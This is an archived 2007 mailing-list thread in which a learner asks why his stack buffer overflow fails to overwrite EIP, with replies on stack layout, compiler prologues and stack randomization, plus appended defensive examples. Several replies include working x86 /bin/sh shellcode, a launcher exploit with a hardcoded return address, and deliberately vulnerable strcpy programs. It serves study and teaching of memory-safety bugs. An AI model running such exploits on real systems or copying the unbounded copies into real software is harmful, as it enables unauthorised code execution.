understanding buffer overflows


understanding buffer overflows

by mike mike-7


Hello, my name is Michael, I'm from Austria - so my English is very bad.

A few days ago I began to experiment with buffer overflows in Linux.

I wrote a little C++ program like this:

#include <string.h>

int main(void)
{
  char buffer[10];                                  /* 10-byte stack buffer */
  char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";  /* source far longer than buffer */
  strcpy(buffer, COPY);                             /* unbounded copy: overruns buffer (intentional) */
  return 0;
}

OK, this works very well: I got a core dump and started gdb, but in the output from "info all" EIP was not overwritten.

So I put a few lines in the program to output addresses of functions and variables.

Addresses of functions were over 0 (e.g. (dec) 500000) and addresses of vars under 0 (e.g. -5000000).

I think this is maybe the problem - but why?

Output from gdb:

eax 0x0 0
ecx 0x41414141 1094795585
edx 0x1d7 471
ebx 0xb7e27ff4 -1209892876
esp 0x4141413d 0x4141413d
ebp 0x41414141 0x41414141
esi 0xb7f77ce0 -1208517408
edi 0x0 0
eip 0x80484ad 0x80484ad
eflags 0x210286 [ PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51


Hope anybody can help me understand/learn.

Greets from Austria, Michael

Re: understanding buffer overflows

by 3APA3A


Dear secacc7@...,

main() function may actually never return, depending on C compiler
implementation. Try it with a different function.

--Wednesday, October 31, 2007, 5:36:22 PM, you wrote to vuln-dev@...:

shc> void main()
shc> {
shc>   char buffer[10];
shc>   char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
shc> strcpy((char *)buffer,(char *)COPY);

shc> }

shc> k, this works very well, i got a core dump and have startet
shc> gdb. but in the output from "info all" was eip not overwritten


--
~/ZARAZA http://securityvulns.com/



Re: understanding buffer overflows

by adimitro


Try this; it is in C but you shouldn't have problems rewriting it.
In your example you are overrunning the buffer, but you might not be overwriting the EIP; try a bigger buffer.

--
Best Regards,

Atanas


/*
 Overflow written for:

 x86 Pentium 4
 Linux version 2.6.5-7.104-default
 gcc version 3.3.3
 SuSE Linux
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define MAX_BUF 530
#define RETADDR 0xbffff0c0

int main()
{
        int i;

        char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        char buffer[MAX_BUF];

        // zero-fill first so the argument string is always NUL-terminated
        memset(buffer, 0, sizeof(buffer));

        // fill the buffer with the return address (long is 4 bytes on this 32-bit target)
        // the address to be overwritten is 524 bytes from the addr of buffer
        for (i = 0; i + 4 <= MAX_BUF; i += 4)
                *(long *)&buffer[i] = RETADDR;

        memcpy(buffer, shellcode, sizeof(shellcode));
        buffer[sizeof(shellcode)-1] = 'A'; // take care of an extra 0x00

        // I compiled the code provided as "vuln"
        execlp("./vuln", "vuln", buffer, NULL);

        exit(0);
}

/*

 OUTPUT:

***@localhost:~> ./test
sh-2.05b$ exit
exit
***@localhost:~>

*/

OVERFLOWN CODE:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo (char *input)
{
  char buffer [512];

  strcpy(buffer, input);   /* no length check: input of 512+ bytes overruns buffer */

  return (0);
}

int main (int argc, char * argv[])
{
  if (argc > 1)
    foo(argv[1]);
  else
    printf("usage: %s string\n", argv[0]);

  exit (0);
}

On 31 Oct 2007 14:36:22 -0000, secacc7@... <secacc7@...> wrote:


Re: Re: understanding buffer overflows

by ma-8


Thank you!

This was a great example but it didn't work on my Debian machine - but it worked better than mine.

I have edited your example as follows:

vuln.cpp:

#include <stdio.h>
#include <string.h>

int foo (char *input)
{
  char buffer [10];
  strcpy(buffer, input);   /* unbounded copy into a 10-byte buffer */
  return (0);
}

int main (int argc, char * argv[])
{
  if (argc > 1)
    foo(argv[1]);
  else
    printf("usage: %s string\n", argv[0]);
  return 1;
}


test.cpp:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
        char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        char buffer[20];
        void *myaddr = shellcode;                  /* address of shellcode in this (test) process */
        printf("Addr of Shellcode:%p\n", myaddr);
        memset(buffer, 'A', sizeof(buffer));       /* non-NUL filler up to the target slot */
        *(long *)&buffer[14] = (long)myaddr;       /* bytes 14..17: the saved EIP slot on this layout */
        buffer[18] = '\0';                         /* terminate the argument string */
        execlp("./vuln", "vuln", buffer, NULL);
        return 0;
}

And I think the output looks very OK - doesn't it?

./test
Addr of Shellcode:0xbfef862a <<-
Speicherzugriffsfehler (core dumped)

And - I think the important part - from gdb:

edi            0x0      0
eip            0xbfef862a       0xbfef862a <<-
eflags         0x210246 [ PF ZF IF RF ID ]

But still no shell session was loaded. :-(


Re: Re: understanding buffer overflows

by mike mike-7


Thanks, this was a great example. Yesterday I posted a reply with a different email address, so I think it was not accepted.

I edited your example as follows (maybe it was a bit different, I'm at work now..):

vuln.cpp:

#include <stdio.h>
#include <string.h>

int foo(char *a)
{
  char buffer[10];
  strcpy(buffer, a);   /* unbounded copy into a 10-byte buffer */
  return 0;
}

int main(int argc, char * argv[])
{
  if (argc > 1)
    foo(argv[1]);
  return 0;
}

test.cpp:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main()
{
  char shellcode[]="Your provided shellcode";
  printf("Address of Shellcode:%p\n", (void *)shellcode);
  char buffer[20];

  // to put the address of shellcode at the correct position of buffer (I have stack randomization on, I think, so it's not static) - in my case I think it was "14"
  // don't know the correct conversion:
  memset(buffer, 'A', sizeof(buffer));       /* non-NUL filler before the target slot */
  *(long *)&buffer[14] = (long)shellcode;    /* bytes 14..17 receive the address */
  buffer[18] = '\0';                         /* terminate the argument string */

  execlp("./vuln", "vuln", buffer, NULL);
  return 0;
}

And this worked fine: after executing (./test) I get a result like this:

Address of shellcode: 0xbffff0c0

and gdb says too that EIP points to 0xbffff0c0

I think this looks good - does it?

Anyway, I didn't get a new instance of the shell.

I think maybe the shellcode hasn't worked.

Greets, Michael!

Re: understanding buffer overflows

by Ben Petering


secacc7@... wrote:

> hello, my name is michael, im from austria - so my english is very bad.
>
> A few days ago i begin to experiment with bufferoverflows in linux.
>
> i wrote a little c++ programm like this:
>
> #include <string.h>
>
> void main()
> {
>   char buffer[10];
>   char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
> strcpy((char *)buffer,(char *)COPY);
>
> }
>
> k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten
>
> so i put a few lines in the program to output addresses from functions and variables.
>
> addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)
>
> i think this is maybe the problem - but why?
>
> output from gdb:
>
>  eax 0x0 0
> ecx 0x41414141 1094795585
> edx 0x1d7 471
> ebx 0xb7e27ff4 -1209892876
> esp 0x4141413d 0x4141413d
> ebp 0x41414141 0x41414141
> esi 0xb7f77ce0 -1208517408
> edi 0x0 0
> eip 0x80484ad 0x80484ad
> eflags 0x210286 [ PF SF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
>
>
> hope anybody can help me understand/learn.
>
> greets from austria, michael
>
See above: you overwrote the saved EBP, ECX, and 3 bytes of ESP. If I
recall correctly, on stack-grows-down architectures (Intel etc. -
likely yours) the saved value of EBP occurs at a lower memory address
than the saved value of EIP (your target). The strcpy() call will copy
bytes to increasing memory addresses, so add bytes to the COPY array -
i.e. lengthen it.

Then, experiment with gdb until you've figured out what array length
overwrites the saved EIP value _exactly_. Make the last few bytes of
COPY 0x41, 0x42, 0x43, 0x44 so you can see what is landing where.

Once you can make the saved value of EIP be 0x44434241, you're ready to
roll.

Cheers
Ben
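To see concretely what Ben describes (saved EBP below the saved EIP, both some distance past the buffer), here is an added example, not code from the thread: it uses the GCC/Clang builtins __builtin_frame_address and __builtin_return_address to measure how far the two saved slots lie past a 10-byte local buffer, and checks that the slot it computes really holds the return address. It assumes a frame-pointer-based layout (x86, x86-64 or AArch64) and a GCC-compatible compiler; struct frame_layout and measure_frame are my names.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Offsets of the saved frame pointer and return-address slots, measured
 * from the first byte of a 10-byte local buffer in the same frame. */
struct frame_layout {
    long to_saved_fp;    /* bytes from buffer[0] to the saved EBP/RBP slot */
    long to_ret_addr;    /* bytes from buffer[0] to the saved EIP/RIP slot */
    int  ret_slot_ok;    /* 1 if that slot really holds our return address */
};

/* noinline keeps this a real call, so a return address is actually saved. */
__attribute__((noinline))
struct frame_layout measure_frame(void)
{
    char buffer[10];
    struct frame_layout l;
    /* __builtin_frame_address(0) points at this frame's saved frame pointer;
     * the return address sits one pointer above it (x86, x86-64, AArch64). */
    uintptr_t fp  = (uintptr_t)__builtin_frame_address(0);
    uintptr_t buf = (uintptr_t)buffer;
    void *ret     = __builtin_return_address(0);

    memset(buffer, 'A', sizeof buffer);   /* same filler the thread uses */
    l.to_saved_fp = (long)(fp - buf);
    l.to_ret_addr = (long)(fp + sizeof(void *) - buf);
    l.ret_slot_ok = (*(void **)(fp + sizeof(void *)) == ret);
    return l;
}

int main(void)
{
    struct frame_layout l = measure_frame();
    printf("saved frame pointer is %ld bytes past buffer[0]\n", l.to_saved_fp);
    printf("return address is     %ld bytes past buffer[0] (%s)\n",
           l.to_ret_addr, l.ret_slot_ok ? "verified" : "not found there");
    /* Anything between byte 10 and to_saved_fp is alignment padding or a
     * stack-protector canary, which is why the offset is rarely exactly 10. */
    return 0;
}
```

The printed offsets are exactly the array length Ben tells Michael to search for with gdb, and the gap beyond 10 bytes shows what the compiler inserted in between.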

Re: understanding buffer overflows

by Chris Eagle


Resending because this did not seem to get through the first time.

secacc7@... wrote:
> hope anybody can help me understand/learn.
>


You are probably using a newer version of gcc which is generating a
slightly different prologue/epilogue for main than you may be expecting.
You should disassemble your program to try to understand it; you will
probably see something like this:

prologue:
 8048354:       8d 4c 24 04             lea    ecx,[esp+4]
 8048358:       83 e4 f0                and    esp,0xfffffff0
 804835b:       ff 71 fc                push   DWORD PTR [ecx-4]
 804835e:       55                      push   ebp
 804835f:       89 e5                   mov    ebp,esp
 8048361:       51                      push   ecx

<other stuff>

epilogue:
 80483d2:       83 c4 54                add    esp,0x54
 80483d5:       59                      pop    ecx
 80483d6:       5d                      pop    ebp
 80483d7:       8d 61 fc                lea    esp,[ecx-4]
 80483da:       c3                      ret

In all likelihood you did overwrite eip, but you are crashing at the ret
because you have clobbered esp (at 80483d7 in this case).  Note that you
did control ecx and ebp, thus you controlled esp as well.  With a
properly structured buffer, this is still exploitable.  Try using the
following program instead to make things a little easier:

#include <string.h>

void vuln() {
  char buffer[10];
  char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
  strcpy(buffer, COPY);   /* overruns buffer: clobbers vuln()'s own saved EBP/EIP, not main()'s */
}

int main() {
   vuln();
   return 0;
}

FYI, it also looks like you may have stack randomization turned on.  You
will probably want to disable any stack protections you are using if
you want to play around with stack overflows.

Chris
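Chris's advice to switch stack randomization and the stack protector off is for studying the crash; the defect in the thread's vuln program is the unbounded strcpy() itself, which no compiler option fixes. As an added example (not code from the thread), here is the thread's foo() beside a hardened version that rejects input which does not fit before copying; BUF_SIZE, foo_vulnerable, foo_hardened and the helper hardened_accepts_len are my names.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512

/* The thread's foo(): strcpy() copies up to the source NUL, however far away. */
int foo_vulnerable(const char *input)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, input);            /* no bound: 512+ byte input overruns buffer */
    return 0;
}

/* Hardened form: find the NUL within the first BUF_SIZE bytes; if there is
 * none the string needs more room than we have, so reject it. Otherwise copy
 * exactly len+1 bytes, so the destination is never overrun and always
 * NUL-terminated. Returns 0 on success, -1 when the input is rejected. */
int foo_hardened(const char *input)
{
    char buffer[BUF_SIZE];
    const char *nul = memchr(input, '\0', BUF_SIZE);   /* bounded scan */
    if (nul == NULL)
        return -1;                                     /* 512+ bytes: too long */
    memcpy(buffer, input, (size_t)(nul - input) + 1);  /* bounded copy */
    return 0;
}

/* Helper: try the check with a constructed string of n 'A' bytes. */
int hardened_accepts_len(size_t n)
{
    static char s[1024];
    if (n >= sizeof s)
        return -1;
    memset(s, 'A', n);
    s[n] = '\0';
    return foo_hardened(s);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("usage: %s string\n", argv[0]);
        return 0;
    }
    if (foo_hardened(argv[1]) != 0)
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
    return 0;
}
```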
